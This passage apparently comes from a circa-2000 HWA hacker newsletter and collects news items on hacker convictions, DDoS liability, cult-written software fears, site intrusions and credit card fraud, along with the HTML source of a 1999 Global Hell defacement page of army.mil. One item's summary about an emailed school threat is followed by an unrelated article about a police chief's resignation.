      Attrition.org - Defacement Mirror       
      http://www.attrition.org/mirror/attrition/1999/06/27/www.army.mil/
      
      
      -=-
      
      Other source, no url sorry...
      
      A hacker convicted of breaking into a US Army Web site has reportedly been 
      sentenced to six months in prison and fined $8,054.

      An Associated Press report today said that 20-year-old Chad Davis pleaded 
      guilty Jan. 4 to gaining unauthorized access to the site and altering its 
      contents by replacing the Army's opening Web page with the "signature 
      page" of Global Hell, a nationwide hacker group of which he was a member.

      US District Judge J.P. Stadtmueller, sitting in Milwaukee, ordered Davis 
      to reimburse the military the cost of restoring the site and added three 
      years of supervised release to the prison term, the report said.

      "This is a deadly serious business. It's not something that's a sandbox 
      play tool," the judge is quoted as saying.

      In other hacking news, the latest congressional Web site to be cracked 
      belongs to House Speaker Dennis Hastert, R-Ill. According to The 
      Washington Post, Haster's Web site was out of commission for several days, 
      with visitors to the homepage getting nothing more than a stream of 
      nonsensical text.

      The site is back up, according to leadership spokespeople      
      
      -=-
      
      The fated defacement; (source)
      
      
      <BASE HREF="http://www4.army.mil/">

      <HTML>
      <TITLE>[gH] Alive as ever. [gH]</TITLE>
      <body bgcolor=000000 text=ffffff>
      <BODY>
      <B>
      Hello. <p>
      
      
      This web page hack has a purpose.  Purpose being to settle rumors.<P><P>
      
      
      global hell/gH is alive.<P>
      
      
      global hell/gH will not die.<P>
      
      
      global hell/gH will always be here.<P><P>
      
      
      global hell/gH would like to thank all the individuals and groups who have
      
      
      supported us and done what they could.  Your work did not go unoticed.
      
      
      Much respect to you all.  You know who you are. <P>
      
      
      
      
      
      <P><P>
      
      
      <H1>        krx. Coming soon. </BINK></H1>
      
      
      <!--HAHA, owned!!!!! HACKED BY: t1edown. -->
      
      
      
      
      
      <!-- A big fsck you to all the fakes out there.  All the fakes gH has had
      
      
      to deal with, all the lamers that have turned their back. For all the
      
      
      people reading this, trust very few people. -->
      
      
      </BODY>
      </HTML>
      
      
      <then he bombed - Ed>
      
      @HWA
      

118.0 HNN:Mar 3rd: Who is Liable If Computers Used in Attacks? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The question of liability has been raised in the wake of
      the recent DDoS against major sites on the internet.
      The computers used to launch the attacks are not only
      the culprits but the victims as well. No one seems to
      have sued a third-party site for being used to
      perpetrate a cyber-attack. But because most attacks
      are presumed to be judgment-proof (no money to pay
      restitution), it is only a matter of time before companies
      that suffer damage from attacks find someone who can
      pay that they can sue. The legal question in such
      lawsuit would be whether the computer owner had a
      duty of care to the victim. 

      New York Law Journal       
      http://www.nylj.com/stories/00/03/030200a5.htm
      
      Getting Hacked Could Lead to Getting
      Sued

      BY RITCHENYA A. SHEPHERD 
      American Lawyer Media News Service 
      Thursday, March 2, 2000 

      WHILE COMPUTER hackers hack and the feds wring their hands, companies
      rushing to connect to the Internet are twisting in the wind of potential liability.

      The hackers that overwhelmed several big Web sites  including those of
      Amazon.com, Buy.com, CNN, eBay, Excite and Yahoo!  with traffic a few
      weeks ago used other people's computers to do it. The hackers mounted their
      attacks by penetrating university computers and commanding them, in turn, to
      deluge the providers with more traffic than individual hackers themselves could
      generate.

      According to specialists in computer law, future attacks could just as well use
      commercial computers. And that fact brings with it an increased responsibility to
      beef up security, the lawyers warn.

      "The hijacked sites are in a unique position; they are both victims and the
      culprits," said Marcelo Halpern, of Chicago's Gordon & Glickson LLC. "The
      question is, are they victims that could have protected themselves?"

      No one appears yet to have sued a third-party site for being used to perpetrate a
      cyber-attack. But because most hackers are presumed to be judgment-proof,
      there is a consensus that it is only a matter of time before companies that suffer
      damage from attacks start to move up the food chain.

      "Somebody's going to get sued; that's clear," said David J. Loundy, of Chicago's
      D'Ancona & Pflaum LLC. "Somebody's going to want a test case. The issue
      [is] whether there's going to be one or two of these suits, or whether it's going to
      be open season against service providers," said Mr. Loundy, who teaches
      computer crime at Chicago's John Marshall Law School.

      "I think there's a straightforward negligence argument," said Stewart A. Baker, a
      partner at Washington, D.C.'s Steptoe & Johnson LLP. "People hacked into
      these computers using known holes in most cases. If you maintain security
      against known hacker attacks, then it's much more difficult to plant the code that
      allows your server to be turned into a zombie."

      The issue in such a suit would be whether the computer owner had a duty of
      care to the ultimate victims. "Whether there's a duty depends on whether the
      courts think there should be," Mr. Baker said. "As the damage to others
      increases, I think courts will have less and less patience [for the argument] that
      there's no duty."

      Amazon.com, Buy. com, CNN, eBay, Excite and Yahoo! all declined to
      comment on whether they are contemplating actions against the third-party sites
      used in attacks against them on Feb. 8 and 9. Lawyers say that the invaded
      universities make unlikely litigation targets.

      The University of California at Los Angeles, U.C. Santa Barbara and Stanford
      University all have confirmed that their computers were used in the attacks. All
      three are cooperating with the FBI investigation. Stanford officials say that the
      attack on eBay used a computer at the university's Hopkins Marine Station in
      Monterey, Calif., which was not as well watched as others. "We will be
      monitoring it much more closely," said Steve Hansen, Stanford's computer
      security chief.

      "University sites are notoriously lax in their security," said Mr. Halpern, so "they
      tend to be fairly easy targets for hackers." But "the sites that were hijacked don't
      make for the nicest defendants ... you're not going to get public sympathy on
      your side suing a university."

      Universities provide public services and must weigh security concerns against
      academic needs for freedom of speech and experimental liberties, lawyers say.
      Therefore, a university could be held to a lower standard than a business. But
      with every new hacker attack, the lawyers say, the standard of care that would
      be applied by a court is likely to rise a notch.

      "Right now, the basic standard is a firewall," said Howard L. Nations, a Houston
      solo practitioner. "But I think the more foreseeable potential hacking becomes,
      the greater the burden to go beyond a firewall and write your own software ... to
      cope with your site's potential security problems."

      A firewall is a gate between the Internet and individual computers that lets
      through some, but not all, traffic, depending on its program.

      "The problem is, it's a moving target," Mr. Nations said of security.
      "State-of-the-art [technology] changes exponentially ... and the hackers are
      moving exponentially plus, so it's a constant battle."

      "Two ways to stay current are to check with Carnegie Mellon University's
      Computer Emergency Response Team, which tracks hacking, and the Sans
      Institute, in Bethesda, Md., which has posted a "road map" to prevent attacks
      such as those launched in early February.

      But things threaten to become "worse, real fast," warns Sans Research Director
      Alan Paller. The attacks identified so far have come from computers operating
      Sun's Solaris or Linux operating systems. But on Feb. 18, administrators
      identified 160 Windows-based PCs at James Madison University in Virginia with
      the same DOS attack code, indicating that they had been prepared for hacker
      use.

      "That means an automated script exists that can take over PCs," said Mr.
      Paller, so computer administrators should upgrade their virus software fast.

      "A lot of people run computers that are unprotected," he said. Even workplaces
      with firewalls are vulnerable because employees may disengage them to
      download Internet goodies.

      The recent attacks could encourage federal legislation. Representative Thomas
      M. Davis, R-Va., is drafting a bill that would create an information analysis center
      to encourage organizations to share information about cyber-attacks. The bill
      would protect disclosing parties from liability and Freedom of Information Act
      requests, said Representative Davis' spokesman, David Marin.

      Mr. Paller, who participated in President Clinton's Feb. 15 summit on on-line
      security, said he expects bills that will take down barriers to sharing information
      about cybercriminals across state lines and that will set security standards for
      government contractors.

      Despite the Internet community's dislike of regulation, lawyers say, someone
      must set the standard of care. "The technology community will say up and down
      that they don't think the government should be involved in this, but once they see
      what private lawyers and judges come up with, they'll be much more open to
      government action," Mr. Baker said.

      Administrators are increasing security by rejecting connection requests from
      sites suspected of adopting inadequate standards. And inquiries for hacker
      insurance appear to be on the rise.

      These measures may not calm the storm. "People don't like to hear this, but
      let's face it: Part of the Internet is just not ready for prime time," Mr. Loundy said.
      "This is a system that a 12-year-old can manipulate and take offline."
      
      @HWA
      
119.0 HNN:Mar 3rd: Email Threat Lands Teenager In Jail 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by David Schwindt 
      A 15-year-old High School student is currently in police
      custody after allegedly threatening school officials
      Monday with a plan to "blow (the school) to pieces."
      The threat was delivered via email from a computer
      within the school. Chad Varner was arrested Wednesday
      on a charge of making threats to place an explosive or
      incendiary device. 

      Clinton Herald       
      http://www.clintonherald.com/display/inn_news/news1.txt
      
      Clinton police chief announces his resignation 

      By Lori Allesee/Herald Staff Writer 

      CLINTON - Clinton Police Chief Gene Beinke announced Thursday he will turn 
      in his badge next month to pursue other career interests. 

      Beinke's notice was submitted to members of the Clinton City Council 
      today. Beinke, who is Clinton's longest serving police chief, will retire 
      from his position May 15. 

      "I have chosen to pursue other career interests," said Beinke, 54, in his 
      letter of resignation. "I am grateful for having had the opportunity to 
      serve you and the community and will take with me many good memories." 

      Beinke could not be contacted for comment today. 

      The Clinton Civil Service Commission will immediately begin searching for 
      Beinke's replacement by compiling a pool of eligible candidates, said City 
      Administrator George Langmack. From the Civil Service Commission's list of 
      finalists, Langmack       will make an appointment with the approval of 
      the Clinton City Council. 

      Beinke's successor is expected to be named within 60 days of his 
      resignation. 

      Beinke was appointed as Clinton's police chief in April 1986. A month 
      later, on May 19, 1986, Beinke took over as the Clinton Police 
      Department's leader. He replaced Russel Bentley. 

      During his tenure, Beinke established Clinton's School Resource Officer 
      Program and the Citizen Police Academy. 

      In 1994, Beinke persisted through an on-going controversy about his 
      management of the police department. That controversy was spearheaded by 
      some City Council members who wanted Beinke terminated. 

      Those allegations set the stage for the same group of people to 
      investigate Langmack. The council believed Langmack failed in his 
      responsibilities when he did not relieve Beinke of his duties. 

      Beinke was later exonerated by the Iowa Attorney General's Office of any 
      allegations of wrong-doing. The Iowa Attorney Genera's Office stated that 
      the allegations were management questions and that only complaints 
      alleging criminal violations       would justify inquiry. 

      Less than a year later, Beinke suffered a brain hemorrhage that took him 
      off the job for nearly three months. Upon his return, one councilmen 
      prompted a campaign to dismiss Beinke from his job. The councilmen 
      questioned Beinke's ability to       perform as chief of police. However, 
      that effort failed. 

      Beinke began his law enforcement career in 1970 when he joined the 
      Waterloo Police Department. Four years later, he took on several roles 
      with the Cedar Falls Police Department. 

      Beinke later joined the Evansville Police Department, serving as a police 
      officer and later as chief of police. In 1983, Beinke accepted the chief 
      of police position in Washington. While serving with the Washington Police 
      Department, Beinke       co-founded the Midwest Association of Police and 
      Prosecutors. 

      Beinke is the second top civil servant in four months to announce his 
      retirement. 

      In November, Clinton Fire Chief Russ Luckritz declared his intention to 
      retire. Luckritz, who served as Clinton's fire chief since 1986, stepped 
      down from his position in January. Luckritz's successor is expected to be 
      announced Tuesday. 
       
      @HWA
      
120.0 HNN:Mar 3rd: Japanese Afraid of Cult Software 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This is an intriguing story, anyone have any further material on
      this? - Ed

      contributed by turtlex hacker 
      Software purchased by the defense agency of Japan
      would link the networks at 20 army garrisons across
      Japan, giving them internet and e-mail access. It has
      been discovered that some of the software may have
      been written by members of the Aum Shinrikyo cult. It is
      feared that Aum Shinrikyo, which carried out the fatal
      gas attack on the Tokyo subway in 1995, may have left
      backdoors into the software they wrote allowing them
      access to defense computer systems. After police
      raided the apartments of eight cult members it was
      discovered that several software firms run by Aum
      members have also provided products for the
      Construction Ministry, the Education Ministry, and the
      Post and Telecommunications Ministry. 

      BBC       
      http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_662000/662172.stm
      
      
      Japan's computers hit by
      cult fears

      Thousands of people were injured in the 1995 attack Japan's Defence Agency 
      has delayed the introduction of a new computer system after discovering 
      that it used software developed by members of the Aum Shinrikyo cult. 

      The discovery has prompted fears that the cult - which carried out the 
      fatal gas attack on the Tokyo subway in 1995 - could use the software to 
      infiltrate government computers and gain access to vital defence 
      information. 

      Tokyo police said the Defence Agency was one of 90 government bodies and 
      private firms which had ordered software produced by the cult. 

      A Defence Agency spokesman told the AFP news agency: "We had been 
      expecting to introduce the system today but halted the plan for the time 
      being as it is too dangerous. 

      "Nobody knows what they have done to the system and we need to check it 
      thoroughly." 

      Chief Cabinet Secretary Mikio Aoki told a news conference: "It should not 
      be impossible to replace the software with that developed by other 
      companies." 

      Subcontractor 

      The Defence Agency signed a contract for the computer system with the 
      Japan Electronic Computer Co Ltd last October. 

      The company, which is not linked to Aum, was to supply the system linking 
      networks at 20 army garrisons across Japan, giving them internet and 
      e-mail access, the defence agency spokesman said. 

      However, the computer firm "told us they had discovered one of the 
      subcontractors they used was linked to Aum". 

      The spokesman said the Defence Agency was "investigating whether Aum 
      members, under the pretext of developing software for the agency, had a 
      chance to figure out ways to break the firewall" that prevents illicit 
      access to its networks. 

      Tokyo police said software firms run by Aum members had also provided 
      products for the Construction Ministry, the Education Ministry, and the 
      Post and Telecommunications Ministry.


      Raids 

      The deals were discovered on Tuesday after police launched raids on eight 
      apartments belonging to cult members. 

      Local reports said about 40 Aum followers were operating five software 
      companies and conducted sales activities covering 500 major companies by 
      offering large discounts. 

      Twelve people were killed and thousands more were injured when Aum 
      launched the sarin gas attack on Tokyo's subway system in March 1995. 

      Aum preached that the world was coming to an end and the cult must arm 
      itself. 

      However in January this year, the cult issued a statement deposing jailed 
      Shoko Asahara as leader, changing its name to Aleph, and vowing to 
      introduce reforms - which included a promise to obey the law. 
      
      
      @HWA
      
121.0 HNN:Mar 3rd:B2B Site Compromised Hours After Going Online 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Three hours after launching the business-to-business
      e-commerce web site it had been broken into. The web
      site, EDAToolsCafe.com, reported the break-in to the
      FBI's San Jose, California regional office who are looking
      into the attack. 

      Business Wire - via Excite News 
      http://news.excite.com/news/bw/000301/ca-edatoolscafe.com
      
      
      "Electro" Hacks EDAToolsCafe.com B2B Portal



      Updated 11:00 AM ET March 1, 2000
  
      SAN JOSE, Calif. (BUSINESS WIRE) - EDAToolsCafe.com a Silicon Valley based
      premier EDA (Electronic Design Automation) web portal opened its business-
      to-business  e-commerce operation at 10AM Monday morning, February 28, and
      was brought down less than three hours later, at 12.24PM by a hacker or 
      hackers who call themselves "Electro." The break-in was reported to the 
      FBI's San Jose, California regional office who are looking into the attack.
  
      The EDAToolsCafe site, which has been in operation for more than three years
      providing resources for the EDA engineering community, announced the opening
      of its b2b e-store in a Business Wire press release earlier in the day. The 
      announcement released jointly by Cohesion Systems a participating EDA 
      software vendor and EDAToolsCafe, was sent over the wire and disseminated
      just hours before the break-in.
  
      Internet Business Systems, Inc. (IBS) owns and operates the EDAToolsCafe
      portal which features sponsorship from Sun Microsystems, Mentor Graphics,
      Avant!, and other major EDA companies.
  
      "The hackers were real pros, but they triggered one of our 'trip-wires'
      and alerted us to their intrusion early in the game," said Brian Haney, 
      IBS VP of Engineering. "The intruders were able to gain access to our 
      server and were in the process of setting up a process that they could 
      then in-turn use to hack the IRC (Internet Relay Chat) network when we 
      shut them down. In the process, they left their signature, a tell-tale 
      calling card 'Electro'." Mr. Haney also said "they had installed modified
      versions of a number of Unix processing and process monitoring programs in
      an attempt to hide behind these and obscure their presence. They were in 
      the process of activating two programs, one called 'muh,' and the other 
      called 'milk' written by a Czechoslovakian programmer. These utilities, 
      once activated, would have allowed the perpetrators to hide behind the 
      EDAToolsCafe while they raided the IRC or caused havoc at other
      major web sites."
  
      Expert assistance, in the form two teenage web system pros, was called in
      to pinpoint the break-in point and install safeguards to prevent future 
      intrusions. The site was put back in service at 10Am Tuesday morning, 
      February 29 after shutting down the EDAToolsCafe server, flushing it out,
      and installing finer grain trip-wires.
  
      "The cost to IBS in terms of lost advertising revenues and e-commerce 
      was minimal and the lessons learned will help prevent future situations
      of this type." Said David Heller, IBS President. He also said that, 
      "The shut down and subsequent refocusing of engineering resources will
      slightly delay the introduction of e-Catalog, a complete b2b solution 
      that was scheduled to premiere on Wednesday, March 1. But, it's better
      to be safe than sorry." 
  
      Contact: Internet Business Systems, Inc., San Jose Sanjay Gangal, 
      408/260-8010 marketing@ibsystems.com 
  
      @HWA
      
122.0 HNN:Mar 3rd:State of Maine May Give Computers to All Students. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      From HNN http://www.hackernews.com/

      contributed by SonjaC 
      State of Maine Governor Angus King has said that
      starting in 2002, he wants each of Maine's 17,000
      seventh-graders to get issued laptop computer and
      receive internet access. King hopes to supply $75 million
      in Federal and state funds to pay for the plan. Some
      lawmakers said that the money would be better spent
      fixing leaky school roofs. (The hardware is worthless
      without the education to support it. Hope they take
      into account the cost of software, technical support
      and upgrades.) 

      Nando Times 
      http://www.nandotimes.com/technology/story/body/0,1634,500175805-500228878-501106733-0,00.html
      
      Maine governor wants a computer on every 7th-grader's lap 

       Copyright  2000 Nando Media Copyright  2000 Associated Press

      
      By GLENN ADAMS 

      GARDINER, Maine (March 2, 2000 3:50 p.m. EST http://www.nandotimes.com) - 
      Echoing the old political promise of a chicken in every pot, Gov. Angus 
      King on Thursday said he wants to put a computer on every kid's lap. 

      Starting in 2002, he wants each of Maine's 17,000 seventh-graders to get a 
      laptop computer that will be theirs to keep, regardless of whether they 
      have one at home. 

      What King calls the nation's most far-reaching school computer initiative 
      generated a cool if not skeptical response in the state Legislature. 
      Reaction in schools across the state was mixed. 

      "The `haves' don't need two or three computers at home," said Howard 
      McFadden, principal of an 80-student school in Edmunds Township. He would 
      like to see the "have-nots" get computers, though. 

      Under King's proposal, students would get computers when they enter the 
      seventh grade. 

      The governor, an independent, hopes to draw $25 million in federal and 
      private money to supplement $50 million in state money and create an 
      endowment that would pay for computers for every succeeding seventh-grade 
      class. 

      "I have not yet run across an idea with more potential to really make a 
      difference in our schools, in our education system and in our young 
      people's prospects, and that's what it's really all about," King said. 

      Some lawmakers balked at the one-time cost of $50 million from the state 
      budget, suggesting that fixing leaky school roofs, for example, should get 
      a higher priority. Requests for school repairs already far exceed the 
      money available,       they said. 

      "The choice of laptops over school renovations is something I can't 
      fathom," said state Rep. Elizabeth Townsend, co-chairwoman of the 
      Appropriations Committee. 

      The proposal earned King praise from educators like Chris Toy, principal 
      of the Freeport Middle School, where 100 seventh-graders would be 
      eligible. 

      "You definitely have to take care of bricks and mortar, but we also need 
      to look at constructing students' minds," he said. 

      The prototype laptops sell for about $600 or $700, but the governor hopes 
      they can be purchased in bulk for as little as $500. 

      King said that Maine is already "doing a ton of construction" and that the 
      state should not wait "until every last gutter is fixed" to adopt the 
      idea. 

      
      @HWA  
      
123.0 HNN:Mar 6th: Coolio Not a Suspect in DDoS Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Simple Nomad 
      Despite what has been published by some overzealous
      media outlets 'Coolio' is not a suspect in the recent
      DDoS attacks. While admitting to defacing several
      hundred web sites including dare.org and rsa.com he
      has denied any involvement in the DDoS attacks. The
      FBI has said that they doubt he is responsible for the
      attacks. While Coolio's computer and other belongings
      have been confiscated no charges have yet been filed. 

      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2455311,00.html      
      
      Coolio' not a suspect in DoS attacks

      Despite admitting hacking 100 sites, the
      17-year-old is not responsible for big
      denial-of-service attacks on Web sites,
      investigators say.



      By David S. Cloud and Joe Mathews, WSJ Interactive
      Edition
      March 3, 2000 8:08 AM PT 


      WASHINGTON -- Federal Bureau of Investigation
      agents investigating last month's Web-site attacks
      said they don't think a 17-year-old New Hampshire
      youth whose name surfaced as a suspect is
      responsible for the incidents.

      The young man, who goes by the online handle "Coolio,"
      became a suspect last month after someone using that
      moniker claimed credit for several Web attacks. Los
      Angeles police questioned him recently in connection
      with attacks on an antidrug site that officers there run, a
      Los Angeles Police Department spokesman said. The
      youth acknowledged hacking into that site and at least
      100 others, the spokesman said. Local prosecutors are
      still considering charging him with computer crimes
      unrelated to last month's attacks on major commercial
      Web sites such as those operated by eBay Inc. (Nasdaq:
      EBAY) and Yahoo Inc., (Nasdaq: YHOO) according to
      the spokesman. The youth's name couldn't be learned.

      Investigators carried out a search warrant on the youth's
      home last month and confiscated several computers that
      were examined by the FBI. Federal investigators believe
      that other hackers may have used the name Coolio. As
      for who is responsible for the denial-of-service attacks,
      officials said that they have "promising leads" and that
      prospects are improving for arrests in the case. The
      leading theory remains that the initial outages beginning
      Feb. 7 were coordinated by an individual or a group and
      were followed by copycat incidents.

      One federal law-enforcement official said the FBI fieldwork
      was "focused in the Atlanta and Boston field offices." Gail
      Marcinkiewicz, spokeswoman for the Boston FBI field
      office, wouldn't confirm that, saying only that the division
      had made no arrests in the case
      
      @HWA
      
124.0 HNN:Mar 6th:Gatsby of the PhoneMasters gets 18 Months 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      The Gatsby (Jonathan Bosanac) has been sentenced to
      18 months in federal prison. He was also ordered to pay
      $10,000 in restitution to three telephone companies. As
      a member of the 'PhoneMasters' Gatsby and others
      perpetrated one of the largest telephone fraud activities
      ever committed. The crimes took place more than five
      years ago. Friends say the man's life has since turned
      around. He's been working as a computer consultant. 

      Associated Press - via Fox News    
      http://www.foxnews.com/vtech/030500/hack.sml
      
      A computer hacker known online as "The
      Gatsby" will spend 18 months in federal prison.


      A judge in San Diego has sentenced Jonathan Bosanac for
      electronically breaking into some of the country's largest computer
      systems.
      
      The judge said his wrongdoing caused more than $1 million in damage 
      to one company alone. Bosanac was ordered to pay $10,000 in restitution
      to three telephone companies he hacked into.
      
      He pleaded guilty in December to participating in one of the nation's 
      biggest hacking schemes.
      
      The crimes took place more than five years ago. Friends say the man's 
      life has since turned around. He's been working as a computer consultant.  
      
      @HWA
      
125.0 HNN:Mar 6th: Cyber Intrusion Used to Cover Up Software Glitch 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evenprime 
      Last week's alleged DoS attack on National Discount
      Brokers was later determined to be a third-party
      software incompatibility. Chairman Dennis Marino said
      last week the site outages "had the earmarks of a
      hacker attack." (Our sites down? We must be under
      attack!) 

      Reuters - via ZD Net
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2455264,00.html?chkpt=p1bn
      
      Wired       
      http://www.wired.com/news/business/0,1367,34719,00.html
      
      Reuters:
      
      Mar 3, 2000 4:51 AM PT
      Web trading site blames hackers -- sort of
      
      National Discount Brokers Group Inc. said periodic disruptions since last
      Thursday to its site at http://www.ndb.com were the result of software 
      incompatibility with products of an outside company. The explanation 
      appeared to step back from comments by a company executive when the 
      disruptions began at the NDB.com site last week. At that time, Chairman
      Dennis Marino said the site outages "had the earmarks of a hacker attack.
      " As a result of what it now said was software conflicts, the company said
      its NDB.com site had been subjected to "several instances of hacker-like 
      denial of services" that precluded some of the company's customers from 
      reaching the Web site. -- Reuters
      
      -=-
      
      Wired;
      
      Hacked by Flawed Software 
      Reuters 
      
      7:25 a.m. 3.Mar.2000 PST 
      NEW YORK -- Hacker attacks can be used to explain a host of Internet ills. 
      
      Online brokerage National Discount Brokers Group Inc. on Thursday gave new 
      definition to the latest criminal phobia by blaming recent outages at its 
      online trading site on "hacker-like" attacks by an unnamed Web software maker. 
      
      
      In a statement, the Jersey City, N.J.-based online share dealer said periodic
      disruptions since last Thursday to its site were the result of software 
      incompatibility with products of the outside company. 
      
      The explanation appeared to step back from comments by a company executive 
      when the disruptions began at the NDB.com site last week. At that time, 
      Chairman Dennis Marino said the site outages "had the earmarks of a hacker
      attack." 
      
      As a result of what it now said was software conflicts, the company said its
      NDB.com site had been subjected to "several instances of hacker-like denial 
      of services" which precluded some of the company's customers from reaching the
      Web site. 
      
      NDB said it was mulling legal action against the company. 
      
      By contrast, last month's assaults on major Web sites such as Yahoo! Inc., 
      eBay Inc. and ETrade Group Inc. were widely believed to have involved the 
      more conventional explanation of hacker attacks: computer break-ins by 
      Internet vandals. 
      
      Through a method known as "denial of service," hackers set up automatic 
      programs that bombard Web sites with so many information requests that 
      legitimate users cannot log on, law enforcement officials have said. 
      
      National Discount said it had been in contact with the software maker and
      is working to correct the problems with the software program but that it 
      was also seeking "appropriate judicial relief." 
      
      On the busiest day of Web site attacks in February, Datek Online Holdings 
      Corp. another online broker, had initially joined the chorus of companies 
      blaming hackers for the site's disruptions. 
      
      However, it later retracted the comments and said the outage was caused by
      an equipment breakdown by an outside network supplier. The 35-minute outage
      occurred at the opening of U.S. stock markets, a peak usage period for
      trading sites. 
      
      In its own explanation, a spokesman for National Discount declined to go 
      beyond the wording of its news release and referred calls to the company's
      legal counsel. The in-house lawyer did not immediately return calls seeking
      comment.
      
      NDB said the situation had resulted in an overall periodic slowdown of Web
      site performance as well as delays in reaching customer service agents and
      registered representatives, crucial issues for a business built around quick
      trading transactions. 
      
      This could help explain why average transaction processing time at NDB for 
      the week of February 22-25 ranked at the bottom of an index of 16 Web broker
      sites compiled by Keynote Systems Inc., a company that tracks Web site
      performance. 
      
      According to Keynote's weekly Web Broker Trading Index, NDB customers had to
      wait an average of 43.9 seconds to reach National Discount's site, twice as 
      slow as the next slowest online trading site. 
      
      National Discount stressed that at no time during these incidents was any
      customer account accessed and no customer account information was affected.
      The outage meant its 200,000 customers could not funnel stock orders
      through the firm's Web site, although they could relay orders over the phone. 
      
      The company said that it had determined the cause of the service outages by
      working with law enforcement officials, regulatory agencies and NDB.com's 
      in-house technology staff. 
      
      NDB has also instituted a number of additional anti-hacking measures on its
      computer systems, it said. 
      
      Copyright  1999-2000 Reuters Limited. 
      
      @HWA
      
126.0 HNN:Mar 6th: Microsoft Hit in Israel 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      Internet Gold, an Israeli ISP, said Sunday that cyber
      vandals had briefly paralyzed the new Microsoft Corp.
      web site on Saturday. www.msn.co.il was evidently hit
      with so much traffic that access was slowed for about
      an hour. Evidently the attack was aimed at a separate
      site and was only being channeled through the Microsoft
      site. (There is a severe lack of information in this
      article.) 

      Reuters - via ZD Net       
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2456092,00.html?chkpt=p1bn
      
      Mar 5, 2000 11:07 AM PT
      Hackers attack MS site in Israel
      
      JERUSALEM -- Israeli ISP Internet Gold said Sunday hackers had briefly
      paralyzed its new site with Microsoft Corp. on Saturday. Internet Gold
      CEO Eli Holtzman, said hackers bombarded Microsoft's new Israeli site,
      www.msn.co.il, with so much traffic that slowed access for about an hour.
      He said hackers had channeled the traffic through Internet Gold with the
      aim of harming another Web site, which he declined to name, located 
      outside Israel. "We are in contact with (the company) to prevent such an
      event in the future,'' Holtzman told Reuters. He would not say whether 
      the attack came from inside Israel or from abroad, but he stressed that
      the cyber invasion broke through a single unprotected Internet gateway 
      and did not collapse network security barriers. In February, a wave of 
      hacker attacks took down half a dozen popular Internet sites. -- Reuters 
      
      @HWA
      
127.0 HNN:Mar 6th: Credit Card Numbers Used in Scam 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
 
      contributed by acopalyse 
      Italian Giuseppe Russo, 34, and his wife, Croatian
      Sandra Elazar, 33, have been arrested in Sicily after
      obtaining the numbers to some 1,000 credit cards and
      going on a costly spending and gambling spree. They
      used the cards over several months and recently began
      to play the lottery to transform the credit into cash.
      They gambled away 1.5 billion lire (S$1.3 million), and
      the winnings were paid into bank accounts. 

      The Straits Times       
      http://www.straitstimes.asia1.com/world/wrld13_0306.html
      
      
      Net to steal 1,000 credit
      card numbers 
      
      ROME -- Two cyber pirates have been arrested in
      Sicily after using the Internet to access about 1,000 US
      credit-card numbers and going on a costly spending
      and gambling spree, Italy's financial watchdog has said.
      
      Italian Giuseppe Russo, 34, and his wife, Croatian
      Sandra Elazar, 33, started the scam after obtaining the
      numbers of some 1,000 credit cards from a Chase
      Manhattan bank and a Citibank Universal branch in the
      US.
      
      Over several months they went on a binge via the
      Internet. But in the last month, the pair began to play
      the lottery to transform the credit into cash. They
      gambled away 1.5 billion lire (S$1.3 million), and the
      winnings were paid into bank accounts. -- AFP 
       
      @HWA
      
128.0 HNN:Mar 6th: Iceland Sells Its Soul 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Dan 
      The medical and genealogy records of every man,
      woman and child within Iceland are now the property of
      a private medical research company known as DeCode.
      It is hoped that the records will help researchers to
      fight disease. Critics worry about the loss of privacy and
      possible breaching of doctor patient confidentiality. 

      CNN 
      http://www.cnn.com/2000/WORLD/europe/03/03/iceland.genes/index.html       
      
      Iceland sells its medical records,
      pitting privacy against greater
      good

      March 3, 2000
      Web posted at: 4:09 a.m. EST (0909 GMT)

      From staff reports

      REYKJAVIK, Iceland (CNN) -- Iceland has
      sold the medical and genealogy records of
      its 275,000 citizens to a private medical
      research company, turning the entire nation
      into a virtual petri dish in hopes of finding
      cures to diseases that have afflicted humans
      for ages. 

      But the promise of curing disease hasn't
      stopped critics from worrying about privacy
      issues created by the sale and storage of personal medical and genetic records. 

      "In our company," said Kari Stefansson of DeCode, the U.S.- funded firm which
      bought the records, "we have the genealogy of the entire people for 1,000 years back
      in time and a computerized record of who is related to whom." 

      The Icelandic population's unique ability to trace its family trees back to the island
      nation's first settlers, makes it a prime candidate for this never before attempted
      mammoth research experiment. 

      Stefansson says these detailed records make Iceland the ideal laboratory for tracing
      the flow of genetic information from one generation to another. 

      He's betting that a vast, centralized data bank of medical and genetic records might
      offer clues to why certain people tend to develop specific maladies, perhaps offering
      the world a chance to understand the diseases and then develop cures for them. 

      But many members of Iceland's medical community are concerned that allowing the
      nation's genetic information to be sold will breach the trust between doctor and
      patient. 

      Some physicians fear their patients might not be as forthcoming about personal
